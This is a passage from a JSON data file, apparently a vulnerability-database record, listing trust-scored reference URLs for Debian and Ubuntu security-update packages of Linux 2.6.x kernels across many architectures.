        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz"
      },
      {
